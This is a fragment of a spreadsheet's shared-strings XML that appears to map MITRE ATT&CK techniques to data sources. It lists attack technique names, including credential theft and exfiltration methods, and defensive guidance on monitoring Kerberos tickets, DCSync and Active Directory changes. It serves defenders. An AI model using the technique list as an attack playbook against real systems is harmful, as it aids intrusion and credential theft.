    <t>PowerShell</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>XPC Services</t>
  </si>
  <si>
    <t>At</t>
  </si>
  <si>
    <t>Container Orchestration Job</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>Systemd Timers</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>Malicious Image</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Additional Cloud Roles</t>
  </si>
  <si>
    <t>Additional Email Delegate Permissions</t>
  </si>
  <si>
    <t>Device Registration</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>Active Setup</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>Login Items</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>XDG Autostart Entries</t>
  </si>
  <si>
    <t>Login Hook</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>Network Logon Script</t>
  </si>
  <si>
    <t>RC Scripts</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>Cloud Account</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Installer Packages</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>COR_PROFILER</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>KernelCallbackTable</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>Hybrid Identity</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Reversible Encryption</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>Office Test</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>IIS Components</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>Terminal Services DLL</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Socket Filters</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>Create Process with Token</t>
  </si>
  <si>
    <t>Make and Impersonate Token</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Domain Trust Modification</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>ListPlanting</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Email Hiding Rules</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Process Argument Spoofing</t>
  </si>
  <si>
    <t>Resource Forking</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>VBA Stomping</t>
  </si>
  <si>
    <t>Disable Cloud Logs</t>
  </si>
  <si>
    <t>Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>Downgrade Attack</t>
  </si>
  <si>
    <t>Impair Command History Logging</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Safe Mode Boot</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>Clear Mailbox Data</t>
  </si>
  <si>
    <t>Clear Network Connection History and Configurations</t>
  </si>
  <si>
    <t>Clear Persistence</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Double File Extension</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>Right-to-Left Override</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>Create Cloud Instance</t>
  </si>
  <si>
    <t>Create Snapshot</t>
  </si>
  <si>
    <t>Delete Cloud Instance</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>Dynamic API Resolution</t>
  </si>
  <si>
    <t>Embedded Payloads</t>
  </si>
  <si>
    <t>HTML Smuggling</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>Stripped Payloads</t>
  </si>
  <si>
    <t>Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>MMC</t>
  </si>
  <si>
    <t>Mavinject</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>PubPrn</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Reduce Key Space</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>Password Managers</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>Windows Credential Manager</t>
  </si>
  <si>
    <t>SAML Tokens</t>
  </si>
  <si>
    <t>Web Cookies</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>Web Portal Capture</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>Container API</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>Cloud Groups</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>System Language Discovery</t>
  </si>
  <si>
    <t>Internet Connection Discovery</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>Remote Data Staging</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>DNS Calculation</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>Dead Drop Resolver</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>External Defacement</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>source ID</t>
  </si>
  <si>
    <t>source name</t>
  </si>
  <si>
    <t>source type</t>
  </si>
  <si>
    <t>mapping type</t>
  </si>
  <si>
    <t>target ID</t>
  </si>
  <si>
    <t>target name</t>
  </si>
  <si>
    <t>target type</t>
  </si>
  <si>
    <t>mapping description</t>
  </si>
  <si>
    <t>Active DNS</t>
  </si>
  <si>
    <t>Active Directory Credential Request</t>
  </si>
  <si>
    <t>Active Directory Object Access</t>
  </si>
  <si>
    <t>Active Directory Object Creation</t>
  </si>
  <si>
    <t>Active Directory Object Deletion</t>
  </si>
  <si>
    <t>Active Directory Object Modification</t>
  </si>
  <si>
    <t>Application Log Content</t>
  </si>
  <si>
    <t>Certificate Registration</t>
  </si>
  <si>
    <t>Cloud Service Disable</t>
  </si>
  <si>
    <t>Cloud Service Enumeration</t>
  </si>
  <si>
    <t>Cloud Service Modification</t>
  </si>
  <si>
    <t>Cloud Storage Access</t>
  </si>
  <si>
    <t>Cloud Storage Creation</t>
  </si>
  <si>
    <t>Cloud Storage Deletion</t>
  </si>
  <si>
    <t>Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>Cloud Storage Metadata</t>
  </si>
  <si>
    <t>Cloud Storage Modification</t>
  </si>
  <si>
    <t>Command Execution</t>
  </si>
  <si>
    <t>Container Creation</t>
  </si>
  <si>
    <t>Container Enumeration</t>
  </si>
  <si>
    <t>Container Start</t>
  </si>
  <si>
    <t>Domain Registration</t>
  </si>
  <si>
    <t>Drive Access</t>
  </si>
  <si>
    <t>Drive Creation</t>
  </si>
  <si>
    <t>Drive Modification</t>
  </si>
  <si>
    <t>Driver Load</t>
  </si>
  <si>
    <t>Driver Metadata</t>
  </si>
  <si>
    <t>File Access</t>
  </si>
  <si>
    <t>File Creation</t>
  </si>
  <si>
    <t>File Metadata</t>
  </si>
  <si>
    <t>File Modification</t>
  </si>
  <si>
    <t>Firewall Disable</t>
  </si>
  <si>
    <t>Firewall Enumeration</t>
  </si>
  <si>
    <t>Firewall Metadata</t>
  </si>
  <si>
    <t>Firewall Rule Modification</t>
  </si>
  <si>
    <t>Firmware Modification</t>
  </si>
  <si>
    <t>Group Enumeration</t>
  </si>
  <si>
    <t>Group Metadata</t>
  </si>
  <si>
    <t>Group Modification</t>
  </si>
  <si>
    <t>Host Status</t>
  </si>
  <si>
    <t>Image Creation</t>
  </si>
  <si>
    <t>Image Deletion</t>
  </si>
  <si>
    <t>Image Metadata</t>
  </si>
  <si>
    <t>Image Modification</t>
  </si>
  <si>
    <t>Instance Creation</t>
  </si>
  <si>
    <t>Instance Deletion</t>
  </si>
  <si>
    <t>Instance Enumeration</t>
  </si>
  <si>
    <t>Instance Metadata</t>
  </si>
  <si>
    <t>Instance Modification</t>
  </si>
  <si>
    <t>Instance Start</t>
  </si>
  <si>
    <t>Instance Stop</t>
  </si>
  <si>
    <t>Kernel Module Load</t>
  </si>
  <si>
    <t>Logon Session Creation</t>
  </si>
  <si>
    <t>Logon Session Metadata</t>
  </si>
  <si>
    <t>Malware Content</t>
  </si>
  <si>
    <t>Malware Metadata</t>
  </si>
  <si>
    <t>Module Load</t>
  </si>
  <si>
    <t>Named Pipe Metadata</t>
  </si>
  <si>
    <t>Network Connection Creation</t>
  </si>
  <si>
    <t>Network Share Access</t>
  </si>
  <si>
    <t>Network Traffic Content</t>
  </si>
  <si>
    <t>Network Traffic Flow</t>
  </si>
  <si>
    <t>OS API Execution</t>
  </si>
  <si>
    <t>Passive DNS</t>
  </si>
  <si>
    <t>Pod Creation</t>
  </si>
  <si>
    <t>Pod Enumeration</t>
  </si>
  <si>
    <t>Pod Modification</t>
  </si>
  <si>
    <t>Process Access</t>
  </si>
  <si>
    <t>Process Creation</t>
  </si>
  <si>
    <t>Process Metadata</t>
  </si>
  <si>
    <t>Process Modification</t>
  </si>
  <si>
    <t>Process Termination</t>
  </si>
  <si>
    <t>Response Content</t>
  </si>
  <si>
    <t>Response Metadata</t>
  </si>
  <si>
    <t>Scheduled Job Creation</t>
  </si>
  <si>
    <t>Scheduled Job Metadata</t>
  </si>
  <si>
    <t>Scheduled Job Modification</t>
  </si>
  <si>
    <t>Script Execution</t>
  </si>
  <si>
    <t>Service Creation</t>
  </si>
  <si>
    <t>Service Metadata</t>
  </si>
  <si>
    <t>Service Modification</t>
  </si>
  <si>
    <t>Snapshot Creation</t>
  </si>
  <si>
    <t>Snapshot Deletion</t>
  </si>
  <si>
    <t>Snapshot Enumeration</t>
  </si>
  <si>
    <t>Snapshot Metadata</t>
  </si>
  <si>
    <t>Snapshot Modification</t>
  </si>
  <si>
    <t>User Account Authentication</t>
  </si>
  <si>
    <t>User Account Creation</t>
  </si>
  <si>
    <t>User Account Deletion</t>
  </si>
  <si>
    <t>User Account Metadata</t>
  </si>
  <si>
    <t>User Account Modification</t>
  </si>
  <si>
    <t>Volume Creation</t>
  </si>
  <si>
    <t>Volume Deletion</t>
  </si>
  <si>
    <t>Volume Enumeration</t>
  </si>
  <si>
    <t>Volume Metadata</t>
  </si>
  <si>
    <t>Volume Modification</t>
  </si>
  <si>
    <t>WMI Creation</t>
  </si>
  <si>
    <t>Web Credential Creation</t>
  </si>
  <si>
    <t>Web Credential Usage</t>
  </si>
  <si>
    <t>Windows Registry Key Access</t>
  </si>
  <si>
    <t>Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Windows Registry Key Deletion</t>
  </si>
  <si>
    <t>Windows Registry Key Modification</t>
  </si>
  <si>
    <t>campaign</t>
  </si>
  <si>
    <t>datacomponent</t>
  </si>
  <si>
    <t>mitigation</t>
  </si>
  <si>
    <t>group</t>
  </si>
  <si>
    <t>software</t>
  </si>
  <si>
    <t>attributed-to</t>
  </si>
  <si>
    <t>detects</t>
  </si>
  <si>
    <t>mitigates</t>
  </si>
  <si>
    <t>uses</t>
  </si>
  <si>
    <t>technique</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>Monitor for queried domain name system (DNS) registry data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for queried domain name system (DNS) registry data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for queried domain name system (DNS) registry data that may compromise third-party DNS servers that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for queried domain name system (DNS) registry data that may hijack domains and/or subdomains that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor queried domain name system (DNS) registry data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Monitor for anomalous activity, such as enabling Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4769, 4768), RC4 encryption within TGTs, and TGS requests without preceding TGT requests. Monitor the lifetime of TGT tickets for values that differ from the default domain duration. Monitor for indications of Pass the Ticket being used to move laterally.</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as enabling Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).</t>
  </si>
  <si>
    <t>Monitor requests of new ticket granting ticket or service tickets to a Domain Controller. Windows Security events such as 4768 (A Kerberos authentication ticket (TGT) was requested) and 4769 (A Kerberos service ticket was requested) combined with logon session creation information may be indicative of an overpass the hash attempt.</t>
  </si>
  <si>
    <t>Monitor requests of new ticket granting ticket or service tickets to a Domain Controller. Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Monitor AD CS certificate requests (ex: EID 4886) as well as issued certificates (ex: EID 4887) for abnormal activity, including unexpected certificate enrollments and signs of abuse within certificate attributes (such as abusable EKUs).(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket) Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally.</t>
  </si>
  <si>
    <t>Monitor requests of new ticket granting ticket or service tickets to a Domain Controller, such as Windows EID 4769 or 4768, that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Monitor for abnormal LDAP queries with filters for &lt;code&gt;groupPolicyContainer&lt;/code&gt; and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Monitor for replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Monitor for the registration or joining of new device objects in Active Directory.</t>
  </si>
  <si>
    <t>Monitor for newly constructed active directory objects, such as Windows EID 5137.</t>
  </si>
  <si>
    <t>Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects.(Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of an active directory object, such as Windows EID 5141.</t>
  </si>
  <si>
    <t>Monitor for changes made to AD settings that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.</t>
  </si>
  <si>
    <t>Monitor for changes made to AD settings for unexpected modifications to user accounts, such as deletions or potentially malicious changes to user attributes (credentials, status, etc.).</t>
  </si>
  <si>
    <t>Monitor for changes to Azure Activity Logs for unexpected modifications to Service Principals and Applications.</t>
  </si>
  <si>
    <t>Monitor for changes to Azure Activity Logs for Service Principal and Application modifications.</t>
  </si>
  <si>
    <t>Monitor for changes made in the Active Directory that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>Monitor for changes made to AD settings for unexpected modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain.</t>
  </si>
  <si>
    <t>Monitor for changes made to ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Monitor for changes made to AD security settings related to MFA logon requirements, such as changes to Azure AD Conditional Access Policies or the registration of new MFA applications.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to AD security settings related to MFA logon requirements, such as changes to Azure AD Conditional Access Policies or the registration of new MFA applications. </t>
  </si>
  <si>
    <t>Monitor for changes made in the Active Directory that may use network logon scripts automatically executed at logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>Monitor property changes in Group Policy: &lt;code&gt;Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption&lt;/code&gt;. By default, the property should be set to Disabled.</t>
  </si>
  <si>
    <t>Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies.(Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>Monitor for changes to account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>Monitor for changes to CA attributes and settings, such as AD CS certificate template modifications (ex: EID 4899/4900 once a potentially malicious certificate is enrolled).(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
